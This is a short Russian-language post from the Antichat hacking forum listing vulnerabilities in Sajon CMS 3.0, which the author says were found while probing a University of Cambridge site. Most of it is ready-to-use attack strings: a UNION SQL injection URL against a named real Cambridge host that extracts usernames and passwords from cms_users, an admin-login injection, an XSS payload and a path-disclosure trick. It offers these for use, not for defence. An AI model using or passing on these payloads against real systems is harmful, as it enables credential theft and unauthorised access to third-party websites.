Форум АНТИЧАТ - Уязвимости Sajon CMS 3.0

Наткнулса исследуя Университет Кембриджа:
Данная CMS не очень распространена, однако на ней несколько ПИАРистых сайтов работают.

Sql-inj

1. Имя файла может меняться, но уязвим параметр key

PHP код:


		
			
http://www.enterprise.cam.ac.uk/archive.php?key=24+UNION+SELECT+username,password+FROM+cmscamenter.cms_users--

2. Скуля в админке, при авторизации

PHP код:


		
			
POST

formloginuser=%00'

XSS

PHP код:


		
			
http://www.site.com/cms/admin.php

POST

action=login&gomodule=>"><script%20%0a%0d>alert(KU-KU,7750312847)%3B</Script>

Тоже самое в goid,gopage

Админка:

PHP код:


		
			
site.com/cms/

Раскрытие пути

PHP код:


		
			
http://www.site.com/cms/admin.php

в поле логина ставим ОДИНАРНУЮ КАВЫЧКУ

PHP код:


		
			
Table: cms_users

Fields: username,password

Author: The Black Pig Design Co Ltd
www.blackpig.co.uk

Сорцов нет;аплоад,судя по логам-есть, но я ненашел.